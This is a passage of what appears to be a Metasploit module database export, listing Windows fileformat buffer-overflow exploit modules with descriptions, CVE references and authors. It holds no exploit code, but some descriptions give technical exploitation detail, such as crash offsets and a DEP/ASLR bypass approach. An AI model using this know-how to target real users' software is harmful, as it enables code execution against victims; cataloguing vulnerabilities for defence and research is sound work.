This module has been tested successfully on AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.","Metasploit Framework License (BSD)","f","2013-05-01 00:00:00",0,,"aggressive","t","EDB-25141, OSVDB-92939","juan vazquez , metacom" 594,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/audio_wkstn_pls.rb","exploit","windows/fileformat/audio_wkstn_pls","exploit/windows/fileformat/audio_wkstn_pls","Audio Workstation 6.4.2.4.3 pls Buffer Overflow",400,"This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. When opening a malicious pls file with the Audio Workstation, a remote attacker could overflow a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-12-08 00:00:00",0,,"aggressive","t","CVE-2009-0476, EDB-10353, OSVDB-55424","dookie, germaya_x" 595,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/audiotran_pls.rb","exploit","windows/fileformat/audiotran_pls","exploit/windows/fileformat/audiotran_pls","Audiotran 1.4.1 (PLS File) Stack Buffer Overflow",400,"This module exploits a stack-based buffer overflow in Audiotran 1.4.1. An attacker must send the file to the victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extension is registered to Audiotran. This functionality has not been tested in this module.","Metasploit Framework License (BSD)","f","2010-01-09 00:00:00",0,,"aggressive","t","CVE-2009-0476, EDB-11079, OSVDB-55424","Sebastien Duquette, dookie" 596,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb","exploit","windows/fileformat/aviosoft_plf_buf","exploit/windows/fileformat/aviosoft_plf_buf","Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",400,"This module exploits a vulnerability found in Aviosoft Digital TV Player Pro version 1.x. 
An overflow occurs when the process copies the content of a playlist file on to the stack, which may result in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2011-11-09 00:00:00",0,,"aggressive","t","EDB-18096, OSVDB-77043","modpr0be, sinn3r " 597,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/bacnet_csv.rb","exploit","windows/fileformat/bacnet_csv","exploit/windows/fileformat/bacnet_csv","BACnet OPC Client Buffer Overflow",400,"This module exploits a stack buffer overflow in SCADA Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client parses a specially crafted csv file, arbitrary code may be executed.","Metasploit Framework License (BSD)","f","2010-09-16 00:00:00",0,,"aggressive","t","BID-43289, OSVDB-68096, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-264-01.pdf","Jeremy Brown, MC " 598,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb","exploit","windows/fileformat/blazedvd_hdtv_bof","exploit/windows/fileformat/blazedvd_hdtv_bof","BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability",300,"This module exploits a vulnerability found in BlazeVideo HDTV Player's filename handling routine. When supplying a string of input data embedded in a .plf file, the MediaPlayerCtrl.dll component will try to extract a filename by using PathFindFileNameA(), and then copies whatever the return value is onto the stack by using an inline strcpy. 
As a result, if this input data is long enough, it can cause a stack-based buffer overflow, which may lead to arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-04-03 00:00:00",0,,"aggressive","t","EDB-18693, EDB-22931, OSVDB-80896","b33f, sinn3r " 599,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/blazedvd_plf.rb","exploit","windows/fileformat/blazedvd_plf","exploit/windows/fileformat/blazedvd_plf","BlazeDVD 5.1 PLF Buffer Overflow",400,"This module exploits a stack overflow in BlazeDVD 5.1. When the application is used to open a specially crafted plf file, a buffer is overwritten allowing for the execution of arbitrary code.","Metasploit Framework License (BSD)","f","2009-08-03 00:00:00",0,,"aggressive","t","BID-35918, CVE-2006-6199, OSVDB-30770","MC " 600,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/bsplayer_m3u.rb","exploit","windows/fileformat/bsplayer_m3u","exploit/windows/fileformat/bsplayer_m3u","BS.Player 2.57 Buffer Overflow (Unicode SEH)",300,"This module exploits a buffer overflow in BS.Player 2.57. When the playlist import is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2010-01-07 00:00:00",0,,"aggressive","t","EDB-15934","C4SS!0 G0M3S, Chris Gabriel" 601,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ca_cab.rb","exploit","windows/fileformat/ca_cab","exploit/windows/fileformat/ca_cab","CA Antivirus Engine CAB Buffer Overflow",400,"This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637. 
By creating a specially crafted CAB file, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-06-05 00:00:00",0,,"aggressive","t","BID-24330, CVE-2007-2864, OSVDB-35245, URL-http://www.zerodayinitiative.com/advisories/ZDI-07-035.html","MC " 602,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb","exploit","windows/fileformat/cain_abel_4918_rdp","exploit/windows/fileformat/cain_abel_4918_rdp","Cain & Abel <= v4.9.24 RDP Buffer Overflow",400,"This module exploits a stack-based buffer overflow in Cain & Abel v4.9.24 and below. An attacker must send the file to the victim, and the victim must open the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.","Metasploit Framework License (BSD)","f","2008-11-30 00:00:00",0,,"aggressive","t","BID-32543, CVE-2008-5405, EDB-7329, OSVDB-50342","Trancek " 603,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb","exploit","windows/fileformat/ccmplayer_m3u_bof","exploit/windows/fileformat/ccmplayer_m3u_bof","CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow",400,"This module exploits a stack based buffer overflow in CCMPlayer 1.5. When opening an m3u playlist with a long track name, a SEH exception record can be overwritten with parts of the controllable buffer. SEH execution is triggered after an invalid read of an injectable address, thus allowing arbitrary code execution. 
This module works on multiple Windows platforms including: Windows XP SP3, Windows Vista, and Windows 7.","Metasploit Framework License (BSD)","f","2011-11-30 00:00:00",0,,"aggressive","t","EDB-18178, OSVDB-77453","Rh0" 604,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb","exploit","windows/fileformat/coolpdf_image_stream_bof","exploit/windows/fileformat/coolpdf_image_stream_bof","Cool PDF Image Stream Buffer Overflow",300,"This module exploits a stack buffer overflow in Cool PDF Reader prior to version 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that contains a specially crafted image stream. This module has been tested successfully on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.","Metasploit Framework License (BSD)","f","2013-01-18 00:00:00",0,,"aggressive","t","CVE-2012-4914, EDB-24463, OSVDB-89349, URL-http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=70&Itemid=70","Chris Gabriel, Francis Provencher, juan vazquez " 605,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/csound_getnum_bof.rb","exploit","windows/fileformat/csound_getnum_bof","exploit/windows/fileformat/csound_getnum_bof","Csound hetro File Handling Stack Buffer Overflow",300,"This module exploits a buffer overflow in Csound before 5.16.6. The overflow occurs when trying to import a malicious hetro file from tabular format. In order to achieve exploitation the user should import the malicious file through csound with a command like ""csound -U het_import msf.csd file.het"". 
This exploit doesn't work if the ""het_import"" command is used directly to convert the file.","Metasploit Framework License (BSD)","f","2012-02-23 00:00:00",0,,"aggressive","t","BID-52144, CVE-2012-0270, OSVDB-79491, URL-http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f, URL-http://secunia.com/secunia_research/2012-3/","Secunia, juan vazquez " 606,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/cutezip_bof.rb","exploit","windows/fileformat/cutezip_bof","exploit/windows/fileformat/cutezip_bof","GlobalSCAPE CuteZIP Stack Buffer Overflow",300,"This module exploits a stack-based buffer overflow vulnerability in version 2.1 of CuteZIP. In order for the command to be executed, an attacker must convince the target user to open a specially crafted zip file with CuteZIP. By doing so, an attacker can execute arbitrary code as the target user.","Metasploit Framework License (BSD)","f","2011-02-12 00:00:00",0,,"aggressive","t","BID-46375, EDB-16162","C4SS!0 G0M3S , juan vazquez " 607,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb","exploit","windows/fileformat/cyberlink_p2g_bof","exploit/windows/fileformat/cyberlink_p2g_bof","CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit",500,"This module exploits a stack buffer overflow in CyberLink Power2Go version 8.x. The vulnerability is triggered when opening a malformed p2g file containing an overly long string in the 'name' attribute of the file element. 
This results in overwriting a structured exception handler record.","Metasploit Framework License (BSD)","f","2011-09-12 00:00:00",0,,"aggressive","t","BID-50997, OSVDB-77600, UDB-18220, US-CERT-VU-158003","modpr0be , mr_me " 608,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/cytel_studio_cy3.rb","exploit","windows/fileformat/cytel_studio_cy3","exploit/windows/fileformat/cytel_studio_cy3","Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow",400,"This module exploits a stack based buffer overflow found in Cytel Studio <= 9.0. The overflow is triggered during the copying of strings to a stack buffer of 256 bytes.","Metasploit Framework License (BSD)","f","2011-10-02 00:00:00",0,,"aggressive","t","BID-49924, OSVDB-75991, URL-http://aluigi.altervista.org/adv/cytel_1-adv.txt","James Fitts , Luigi Auriemma" 609,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/deepburner_path.rb","exploit","windows/fileformat/deepburner_path","exploit/windows/fileformat/deepburner_path","AstonSoft DeepBurner (DBR File) Path Buffer Overflow",500,"This module exploits a stack-based buffer overflow in versions 1.9.0.228, 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc). An attacker must send the file to the victim and the victim must open the file. 
Alternatively it may be possible to execute code remotely via an embedded DBR file within a browser, since the DBR extension is registered to DeepBurner.","Metasploit Framework License (BSD)","f","2006-12-19 00:00:00",0,,"aggressive","t","BID-21657, CVE-2006-6665, EDB-11315, EDB-2950, EDB-8335, OSVDB-32356","Expanders, fl0 fl0w, jduck " 610,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/destinymediaplayer16.rb","exploit","windows/fileformat/destinymediaplayer16","exploit/windows/fileformat/destinymediaplayer16","Destiny Media Player 1.61 PLS M3U Buffer Overflow",400,"This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61. An attacker must send the file to the victim and the victim must open the file via File-->Open Playlist.","Metasploit Framework License (BSD)","f","2009-01-03 00:00:00",0,,"aggressive","t","BID-33091, CVE-2009-3429, EDB-7651, OSVDB-53249","Trancek " 611,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/digital_music_pad_pls.rb","exploit","windows/fileformat/digital_music_pad_pls","exploit/windows/fileformat/digital_music_pad_pls","Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow",300,"This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4. When opening a malicious pls file with the Digital Music Pad, a remote attacker could overflow a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-09-17 00:00:00",0,,"aggressive","t","EDB-15134, OSVDB-68178, URL-http://secunia.com/advisories/41519/","Abhishek Lyall " 612,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/djstudio_pls_bof.rb","exploit","windows/fileformat/djstudio_pls_bof","exploit/windows/fileformat/djstudio_pls_bof","DJ Studio Pro 5.1 .pls Stack Buffer Overflow",300,"This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2. 
When handling a .pls file, DJ Studio will copy the user-supplied data onto the stack without any proper bounds checking done beforehand, therefore allowing code execution under the context of the user.","Metasploit Framework License (BSD)","f","2009-12-30 00:00:00",0,,"aggressive","t","CVE-2009-4656, EDB-10827, OSVDB-58159","Death-Shadow-Dark , Sebastien Duquette" 613,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/djvu_imageurl.rb","exploit","windows/fileformat/djvu_imageurl","exploit/windows/fileformat/djvu_imageurl","DjVu DjVu_ActiveX_MSOffice.dll ActiveX Component Buffer Overflow",100,"This module exploits a stack buffer overflow in the DjVu ActiveX Component. When sending an overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.","Metasploit Framework License (BSD)","f","2008-10-30 00:00:00",0,,"aggressive","t","BID-31987, CVE-2008-4922, OSVDB-49592","dean " 614,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/dvdx_plf_bof.rb","exploit","windows/fileformat/dvdx_plf_bof","exploit/windows/fileformat/dvdx_plf_bof","DVD X Player 5.5 .plf PlayList Buffer Overflow",300,"This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and Standard. By supplying a long string of data in a plf file (playlist), the MediaPlayerCtrl.dll component will attempt to extract a filename out of the string, and then copy it onto the stack without any proper bounds checking, which causes a buffer overflow and results in arbitrary code execution under the context of the user. 
This module has been designed to target common Windows systems such as: Windows XP SP2/SP3, Windows Vista, and Windows 7.","Metasploit Framework License (BSD)","f","2007-06-02 00:00:00",0,,"aggressive","t","BID-24278, CVE-2007-3068, EDB-17745, OSVDB-36956","D3r K0n!G, n00b, sickness, sinn3r " 615,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb","exploit","windows/fileformat/emc_appextender_keyworks","exploit/windows/fileformat/emc_appextender_keyworks","EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow",200,"This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's Documentation ApplicationXtender 5.4.","Metasploit Framework License (BSD)","f","2009-09-29 00:00:00",0,,"aggressive","t","BID-36546, OSVDB-58423","MC " 616,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb","exploit","windows/fileformat/erdas_er_viewer_bof","exploit/windows/fileformat/erdas_er_viewer_bof","ERS Viewer 2011 ERS File Handling Buffer Overflow",300,"This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the function ERM_convert_to_correct_webpath handles user provided data in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. 
This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.","Metasploit Framework License (BSD)","f","2013-04-23 00:00:00",0,,"aggressive","t","BID-59379, CVE-2013-0726, OSVDB-92694, URL-http://secunia.com/advisories/51725/","Parvez Anwar, juan vazquez " 617,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb","exploit","windows/fileformat/esignal_styletemplate_bof","exploit/windows/fileformat/esignal_styletemplate_bof","eSignal and eSignal Pro <= 10.6.2425.1208 file parsing buffer overflow in QUO",300,"The software is unable to handle the """" files (even those originally included in the program) like those with the registered extensions QUO, SUM and POR. Successful exploitation of this vulnerability may take up to several seconds due to the use of egghunter. Also, DEP bypass is unlikely due to the limited space for payload.","Metasploit Framework License (BSD)","f","2011-09-06 00:00:00",0,,"aggressive","t","BID-49600, CVE-2011-3494, EDB-17837, OSVDB-75456, URL-http://aluigi.altervista.org/adv/esignal_1-adv.txt","Luigi Auriemma, TecR0c , mr_me " 618,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/etrust_pestscan.rb","exploit","windows/fileformat/etrust_pestscan","exploit/windows/fileformat/etrust_pestscan","CA eTrust PestPatrol ActiveX Control Buffer Overflow",200,"This module exploits a stack buffer overflow in CA eTrust PestPatrol. 
When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-11-02 00:00:00",0,,"aggressive","t","CVE-2009-4225, OSVDB-60862, URL-http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm","MC " 619,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ezip_wizard_bof.rb","exploit","windows/fileformat/ezip_wizard_bof","exploit/windows/fileformat/ezip_wizard_bof","eZip Wizard 3.0 Stack Buffer Overflow",400,"This module exploits a stack-based buffer overflow vulnerability in version 3.0 of ediSys Corp.'s eZip Wizard. In order for the command to be executed, an attacker must convince someone to open a specially crafted zip file with eZip Wizard, and access the specially crafted file by double-clicking it. By doing so, an attacker can execute arbitrary code as the victim user.","Metasploit Framework License (BSD)","f","2009-03-09 00:00:00",0,,"aggressive","t","BID-34044, CVE-2009-1028, EDB-12059, EDB-8180, OSVDB-52815, URL-http://www.edisys.com/","Lincoln, fl0 fl0w, jduck " 620,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/fatplayer_wav.rb","exploit","windows/fileformat/fatplayer_wav","exploit/windows/fileformat/fatplayer_wav","Fat Player Media Player 0.6b0 Buffer Overflow",300,"This module exploits a buffer overflow in Fat Player 0.6b. 
When the application is used to import a specially crafted wav file, a buffer overflow occurs allowing arbitrary code execution.","Metasploit Framework License (BSD)","f","2010-10-18 00:00:00",0,,"aggressive","t","CVE-2009-4962, EDB-15279, OSVDB-57343","James Fitts , dookie" 621,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/fdm_torrent.rb","exploit","windows/fileformat/fdm_torrent","exploit/windows/fileformat/fdm_torrent","Free Download Manager Torrent Parsing Buffer Overflow",400,"This module exploits a stack buffer overflow in Free Download Manager 3.0 Build 844. Arbitrary code execution could occur when parsing a specially crafted torrent file.","Metasploit Framework License (BSD)","f","2009-02-02 00:00:00",0,,"aggressive","t","BID-33555, CVE-2009-0184, OSVDB-54033, URL-http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl, URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18, URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18, URL-http://secunia.com/secunia_research/2009-5/","SkD , jduck " 622,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/feeddemon_opml.rb","exploit","windows/fileformat/feeddemon_opml","exploit/windows/fileformat/feeddemon_opml","FeedDemon <= 3.1.0.12 Stack Buffer Overflow",500,"This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application is used to import a specially crafted opml file, a buffer overflow occurs allowing arbitrary code execution. All versions are suspected to be vulnerable. 
This vulnerability was originally reported against version 2.7 in February of 2009.","Metasploit Framework License (BSD)","f","2009-02-09 00:00:00",0,,"aggressive","t","BID-33630, CVE-2009-0546, EDB-11379, EDB-7995, EDB-8010, OSVDB-51753","dookie, fl0 fl0w, jduck " 623,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb","exploit","windows/fileformat/foxit_reader_filewrite","exploit/windows/fileformat/foxit_reader_filewrite","Foxit PDF Reader 4.2 Javascript File Write",300,"This module exploits an unsafe Javascript API implemented in Foxit PDF Reader version 4.2. The createDataObject() Javascript API function allows for writing arbitrary files to the file system. This issue was fixed in version 4.3.1.0218. Note: This exploit currently uses the All Users directory, which requires administrator privileges to write to. This means an administrative user has to open the file to be successful. Kind of lame but that's how it goes sometimes in the world of file write bugs.","Metasploit Framework License (BSD)","f","2011-03-05 00:00:00",0,,"aggressive","t","OSVDB-71104, URL-http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html","Chris Evans, bannedit " 624,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/foxit_reader_launch.rb","exploit","windows/fileformat/foxit_reader_launch","exploit/windows/fileformat/foxit_reader_launch","Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow",400,"This module exploits a buffer overflow in Foxit Reader 3.0 builds 1301 and earlier. 
Due to the way Foxit Reader handles the input from a ""Launch"" action, it is possible to cause a stack-based buffer overflow, allowing an attacker to gain arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2009-03-09 00:00:00",0,,"aggressive","t","BID-34035, CVE-2009-0837, OSVDB-55614, URL-http://www.coresecurity.com/content/foxit-reader-vulnerabilities","Francisco Falcon, bannedit " 625,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/foxit_title_bof.rb","exploit","windows/fileformat/foxit_title_bof","exploit/windows/fileformat/foxit_title_bof","Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in Foxit PDF Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in the Title field. This results in overwriting a structured exception handler record. NOTE: This exploit does not use javascript.","Metasploit Framework License (BSD)","f","2010-11-13 00:00:00",0,,"aggressive","t","EDB-15532, OSVDB-68648, URL-http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/","Sud0, corelanc0d3r , dookie, jduck " 626,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb","exploit","windows/fileformat/free_mp3_ripper_wav","exploit/windows/fileformat/free_mp3_ripper_wav","Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow",500,"This module exploits a stack based buffer overflow found in Free MP3 CD Ripper 1.1. 
The overflow is triggered when an unsuspecting user opens a malicious WAV file.","Metasploit Framework License (BSD)","f","2011-08-27 00:00:00",0,,"aggressive","t","EDB-11975, EDB-17727, OSVDB-63349","James Fitts , Richard Leahy, Tiago Henriques, X-h4ck" 627,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/galan_fileformat_bof.rb","exploit","windows/fileformat/galan_fileformat_bof","exploit/windows/fileformat/galan_fileformat_bof","gAlan 0.2.1 Buffer Overflow",300,"This module exploits a stack buffer overflow in gAlan 0.2.1 by creating a specially crafted galan file.","Metasploit Framework License (BSD)","f","2009-12-07 00:00:00",0,,"aggressive","t","EDB-10339, OSVDB-60897","Jeremy Brown <0xjbrown41@gmail.com>, loneferret" 628,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/gsm_sim.rb","exploit","windows/fileformat/gsm_sim","exploit/windows/fileformat/gsm_sim","GSM SIM Editor 5.15 Buffer Overflow",300,"This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15. When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer overflow occurs which allows an attacker to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-07-07 00:00:00",0,,"aggressive","t","EDB-14258","Lincoln , Ruben Alejandro, chap0 " 629,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/gta_samp.rb","exploit","windows/fileformat/gta_samp","exploit/windows/fileformat/gta_samp","GTA SA-MP server.cfg Buffer Overflow",300,"This module exploits a stack-based buffer overflow in GTA SA-MP Server. This buffer overflow occurs when the application attempts to open a malformed server.cfg file. 
To exploit this vulnerability, an attacker must send the victim a server.cfg file and have them run samp-server.exe.","Metasploit Framework License (BSD)","f","2011-09-18 00:00:00",0,,"aggressive","t","EDB-17893","Silent_Dream" 630,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb","exploit","windows/fileformat/hhw_hhp_compiledfile_bof","exploit/windows/fileformat/hhw_hhp_compiledfile_bof","HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow",400,"This module exploits a stack buffer overflow in HTML Help Workshop 4.74. By creating a specially crafted hhp file, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2006-02-06 00:00:00",0,,"aggressive","t","CVE-2006-0564, EDB-1488, EDB-1490, OSVDB-22941","bratax, jduck " 631,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb","exploit","windows/fileformat/hhw_hhp_contentfile_bof","exploit/windows/fileformat/hhw_hhp_contentfile_bof","HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow",400,"This module exploits a stack buffer overflow in HTML Help Workshop 4.74 by creating a specially crafted hhp file.","Metasploit Framework License (BSD)","f","2006-02-06 00:00:00",0,,"aggressive","t","CVE-2006-0564, EDB-1470, EDB-1495, OSVDB-22941","bratax, jduck " 632,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb","exploit","windows/fileformat/hhw_hhp_indexfile_bof","exploit/windows/fileformat/hhw_hhp_indexfile_bof","HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow",400,"This module exploits a stack buffer overflow in HTML Help Workshop 4.74 by creating a specially crafted hhp file.","Metasploit Framework License (BSD)","f","2009-01-17 00:00:00",0,,"aggressive","t","BID-33189, CVE-2009-0133, EDB-10323, EDB-10335, OSVDB-22941","Encrypt3d.M!nd, jduck , loneferret" 
633,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb","exploit","windows/fileformat/ht_mp3player_ht3_bof","exploit/windows/fileformat/ht_mp3player_ht3_bof","HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow",400,"This module exploits a stack buffer overflow in HT-MP3Player 1.0. Arbitrary code execution could occur when parsing a specially crafted .HT3 file. NOTE: The player installation does not register the file type to be handled. Therefore, a user must take extra steps to load this file.","Metasploit Framework License (BSD)","f","2009-06-29 00:00:00",0,,"aggressive","t","CVE-2009-2485, EDB-9034, EDB-9038, OSVDB-55449","His0k4, hack4love , jduck " 634,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ibm_pcm_ws.rb","exploit","windows/fileformat/ibm_pcm_ws","exploit/windows/fileformat/ibm_pcm_ws","IBM Personal Communications iSeries Access WorkStation 5.9 Profile",500,"The IBM Personal Communications I-Series application WorkStation is susceptible to a stack-based buffer overflow vulnerability within file parsing in which data copied to a location in memory exceeds the size of the reserved destination area. The buffer is located on the runtime program stack. When the WorkStation file is opened it will reach the code path at 0x67575180 located in pcspref.dll which conducts string manipulation and validation on the data supplied in the WorkStation file. The application will first check if 'Profile' header exists and appends a dot with the next parameter within the file. It will then measure the character length of the header by calling strcspn with a dot as its null-terminated character. It will then write the header into memory and ensure the header ends with a NUL character. The parameter character array is passed to the strcpy() function. The application has declared a 52-element character array for the destination for strcpy function. 
The function does not perform bounds checking; therefore, data can be written past the end of the buffer variable, resulting in corruption of adjacent variables including other local variables, program state information and function arguments. You will notice that the saved RETURN address at offset 0x6c is overwritten by the data written past the buffer. To ensure we can perform arbitrary code execution we must provide a valid pointer at 0x74 which is used as an argument for the called function at 0x675751ED as an id file extension parameter. Once the caller regains control we will reach our RETURN. The Ret instruction will be used to pop the overwritten saved return address which was corrupted. This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform. Versions tested: IBM System i Access for Windows V6R1M0 version 06.01.0001.0000a Which bundles pcsws.exe version 5090.27271.709 Tested on: Microsoft Windows XP [Version 5.1.2600] Microsoft Windows Vista [Version 6.0.6002] Microsoft Windows 7 [Version 6.1.7600]","Metasploit Framework License (BSD)","f","2012-02-28 00:00:00",0,,"aggressive","t","CVE-2012-0201, OSVDB-79657, URL-https://www-304.ibm.com/support/docview.wss?uid=swg21586166","TecR0c " 635,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ideal_migration_ipj.rb","exploit","windows/fileformat/ideal_migration_ipj","exploit/windows/fileformat/ideal_migration_ipj","PointDev IDEAL Migration Buffer Overflow",500,"This module exploits a stack buffer overflow in versions v9.7 through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of IDEAL Migration. All versions are suspected to be vulnerable. By creating a specially crafted ipj file, an attacker may be able to execute arbitrary code. 
